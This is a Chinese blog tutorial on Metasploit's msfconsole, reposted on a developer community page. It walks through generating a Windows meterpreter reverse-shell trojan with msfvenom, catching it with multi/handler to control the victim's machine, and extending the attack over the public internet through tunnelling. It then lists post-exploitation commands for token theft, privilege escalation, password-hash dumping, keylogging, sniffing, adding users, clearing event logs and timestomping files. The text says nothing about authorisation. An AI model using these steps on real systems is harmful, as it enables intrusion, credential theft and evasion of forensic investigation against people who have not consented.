Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >msfconsole使用教程_kali msfconsole

msfconsole使用教程_kali msfconsole

作者头像
全栈程序员站长
发布于 2022-10-04 07:28:04
发布于 2022-10-04 07:28:04
4.5K10
代码可运行
举报
运行总次数:0
代码可运行

大家好,又见面了,我是你们的朋友全栈君。

文章目录

前言

Metasploit Framework 是非常优秀的开源渗透测试框架。 Metasploit 渗透测试框架(MSF3.4)包含3功能模块:msfconsole、msfweb、msfupdate。msfupdate用于软件更新,建议使用前先进行更新,可以更新最新的漏洞库和利用代码。msfconsole 是整个框架中最受欢迎的模块,个人感觉也是功能强大的模块,所有的功能都可以该模块下运行。msfweb 是Metasploit framework的web组件支持多用户,是Metasploit图形化接口。

一、入侵步骤

先生成一个木马

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o .exe

之后进入msfconsole 使用到他的监听模块

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
use exploit/multi/handler

设置payload

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
set payload windows/meterpreter/reverse_tcp

设置监听端口和ip与之前生成的木马一致

之后监听端口,在木马文件被执行后,则会控制此电脑

之后可以获取目标的shell

ps之后通过学习了解了内网穿透

简单实现了内网穿透进行了公网攻击 与内网不同的是生成的木马变成了用服务器的端口和ip地址。监听端口为服务器端口,监听ip为本机127.0.0.1 其他与内网攻击相同

二、msfconsole常用命令

命令: show exploit 列出metasploit框架中的所有渗透攻击模块。 命令:show payloads列出metasploit框架中的所有攻击载荷。 命令:show auxiliary列出metasploit框架中的所有辅助攻击载荷。 命令:search name查找metasploit框架中所有的渗透攻击和其他模块。 命令:info展示出制定渗透攻击或模块的相关信息。 命令:use name装载一个渗透攻击或模块。 命令:LHOST你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特别为反弹式shell使用。 命令:RHOST远程主机或是目标主机。 命令:set function设置特定的配置参数(EG:设置本地或远程主机参数)。 命令:setg function以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。 命令:show options列出某个渗透攻击或模块中所有的配置参数。 命令:show targets列出渗透攻击所有支持的目标平台。 命令:set target num指定你所知道的目标的操作系统以及补丁版本类型。 命令:set payload name指定想要使用的攻击载荷。 命令:show advanced列出所有高级配置选项。 命令:set autorunscript migrate -f.在渗透攻击完成后,将自动迁移到另一个进程。 命令:check检测目标是否选定渗透攻击存在相应的安全漏洞。 命令:exploit执行渗透攻击或模块来攻击目标。 命令:exploit -j在计划任务下进行渗透攻击(攻击将在后台进行)。 命令:exploit -z渗透攻击完成后不与回话进行交互

help

打开meterpreter使用帮助。

run scriptname

运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。

sysinfo

列出受控主机的系统信息。

ls

列出目标主机的文件和文件夹信息。

use priv

加载特权提升扩展模块,来扩展metasploit库。

ps

显示所有运行的进程以及相关联的用户账户。

migrate PID

迁移到一个指定的进程ID(PID号可通过ps命令从主机上获得)。

use incognito

加载incognito功能(用来盗窃目标主机的令牌或假冒用户)

list_tokens -u

列出目标主机用户的可用令牌。

list_tokens -g

列出目标主机用户组的可用令牌。

impersonate_token DOMAIN_NAME\USERNAME

假冒目标主机上的可用令牌。

steal_token PID

盗窃给定进程的可用令牌并进行令牌假冒。

drop_token

停止假冒当前令牌。

getsystem

通过各种攻击向量来提升系统用户权限。

execute -f cmd.exe -i

执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t

以所有可用令牌来执行cmd命令并隐藏该进程。

rev2self

回到控制目标主机的初始用户账户下。

reg command

在目标主机注册表中进行交互,创建,删除,查询等操作。

setdesktop number

切换到另一个用户界面(该功能基于那些用户已登录)。

screenshot

对目标主机的屏幕进行截图。

upload file

向目标主机上传文件。

download file

从目标主机下载文件。

keyscan_start

针对远程目标主机开启键盘记录功能。

keyscan_dump

存储目标主机上捕获的键盘记录。

keyscan_stop

停止针对目标主机的键盘记录。

getprivs

尽可能多的获取目标主机上的特权。

uictl enable keyboard/mouse

接管目标主机的键盘和鼠标。

background

将你当前的metasploit shell转为后台执行。

hashdump

导出目标主机中的口令哈希值。

use sniffer

加载嗅探模式。

sniffer_interfaces

列出目标主机所有开放的网络端口。

sniffer_dump interfaceID pcapname

在目标主机上启动嗅探。

sniffer_start interfaceID packet-buffer

在目标主机上针对特定范围的数据包缓冲区启动嗅探。

sniffer_stats interfaceID

获取正在实施嗅探网络接口的统计数据。

sniffer_stop interfaceID

停止嗅探。

add_user username password -h ip

在远程目标主机上添加一个用户。

clearev

清楚目标主机上的日志记录。

timestomp

修改文件属性,例如修改文件的创建时间(反取证调查)。

reboot

重启目标主机。

总结

msfconsole在上学期暑期集训时就有所接触了解,现在重新推到重新来过了一遍,感觉自己相比以前对那些命令渐渐不再陌生,懂得了一些命令的含义。 这种攻击方法依然是依赖于同一局域网的存在,在相同网段下可以获取别人电脑的权限。 不过今天通过一些资料了解到通过内网穿透好像是可以实现公网之间的渗透。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/196500.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月6日 下,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
1 条评论
热度
最新
确定不run一下?
确定不run一下?
回复回复点赞举报
推荐阅读
编辑精选文章
换一批
渗透测试利器msf常用命令
show exploits 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击载荷。 search name 查找metasploit框架中所有的渗透攻击和其他模块。 info 展示出制定渗透攻击或模块的相关信息。 use name 装载一个渗透攻击或模块。 LHOST 你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共
赵腰静
2018/03/09
1.5K0
Metasploit 学习记录
一直在用 Metasploit,但是从来没有花时间仔细去研究这个工具,最近得空就系统的研究研究,故于此记录之。
小简
2023/01/04
2.3K0
Metasploit 学习记录
工具的使用 | Metasploit Framework(MSF)的使用
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
谢公子
2022/01/13
2.5K0
工具的使用 | Metasploit Framework(MSF)的使用
Metasploit从入门到入坟
MSF是当今安全专业人员免费提供的最有用的审计工具之一!!本篇为地基篇,都是基础必备知识,掌握它吧~
用户6343818
2020/12/14
1.1K0
Metasploit从入门到入坟
浅谈MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
FB客服
2019/08/20
1.6K0
学习之详细说说MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
TRY博客-简单的网络技术
2022/07/18
1.7K0
学习之详细说说MSF渗透测试
MSF后渗透利用整理|MSF命令大全二
use exploit/windows/local/ms18_8120_win32k_privesc
洛米唯熊
2019/07/25
3.7K0
MSF后渗透利用整理|MSF命令大全二
Kali之安卓木马
Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下:
知识与交流
2021/04/02
2.8K0
Kali之安卓木马
msfconsole学习
指令:show options – 查看需要填写的参数和参数填写状态
全栈程序员站长
2022/10/04
7520
浅谈MSF渗透测试
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
顾翔
2019/12/12
1.1K0
浅谈MSF渗透测试
MSF工具简介及实例
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行
不屈的杨
2024/08/16
2550
MSF工具简介及实例
msfconsole模块_msfconsole下载
测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的有内存溢出,网站程序漏洞利用,配置错误exploit。 exploits总的来说共分为两类溢出(exploit)攻击方法,即主动溢出和被动溢出。主动溢出是针对目标主机的漏洞主动的进行攻击以获得控制权限,被动溢出是针 对目标主机被动的监听然后获得相应的操作。 Exploit共分为13种,分别是:ais、bsdi、dialup、freebsd、hpux、irix、linux、multi、netware、osx、solaris、unix、windows。其中windows下面的最多。
全栈程序员站长
2022/10/04
3530
msfconsole从入门到放弃
msfconsole简称msf是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马。是出家旅行的必备神器,今天我们在一起来回顾下吧。
逍遥子大表哥
2021/12/17
1.5K0
msfconsole从入门到放弃
Metasploit(MSF)使用教程(以ms17_010永恒之蓝为例)
一.Metasploit简介: Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。
天乐404
2024/03/14
2K0
Metasploit(MSF)使用教程(以ms17_010永恒之蓝为例)
msfconsole是什么意思_msfconsole渗透手机
以社工等方法获取到xp主机的shell 通过metasploit会话,使用Windows xp靶机作为跳板,扫描和攻击内部网络主机
全栈程序员站长
2022/10/29
5860
msfconsole是什么意思_msfconsole渗透手机
Metasploit常用命令整理
use exploit/windows/misc/hta_server # 一句话hat后门
drunk_kk
2021/03/23
1.2K0
Kali Linux 秘籍 第六章 漏洞利用
一旦我们完成了漏洞扫描步骤,我们就了解了必要的知识来尝试利用目标系统上的漏洞。这一章中,我们会使用不同的工具来操作,包括系统测试的瑞士军刀 Metasploit。
ApacheCN_飞龙
2022/11/27
8620
渗透测试工具——Metasploit[通俗易懂]
操作机:Kali Linux 2021.1, Metasploit Frameworks 6.0.30 目标机:Windows Server 2003 sp2中文版(含ms08-067漏洞)Windows xp 英文版
全栈程序员站长
2022/09/21
5.2K0
渗透测试工具——Metasploit[通俗易懂]
Kali Linux 秘籍 第七章 权限提升
我们已经获得了想要攻击的计算机的权限。于是将权限尽可能提升就非常重要。通常,我们能访问较低权限的用户账户(计算机用户),但是,我们的目标账户可能是管理员账户。这一章中我们会探索几种提升权限的方式。
ApacheCN_飞龙
2022/11/27
6540
利用frp搭建公网Metasploit并使用Shellter实现简单木马免杀
免责声明:本公众号安全类、工具类文章仅用于安全学习、安全研究、技术交流,内容来源于互联网已公开内容,若读者利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由读者本人负责,文章作者不承担任何责任。请遵守相关网络安全法律法规,禁止非法用途!
yuanfan2012
2021/05/11
2.1K0
利用frp搭建公网Metasploit并使用Shellter实现简单木马免杀
相关推荐
渗透测试利器msf常用命令
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验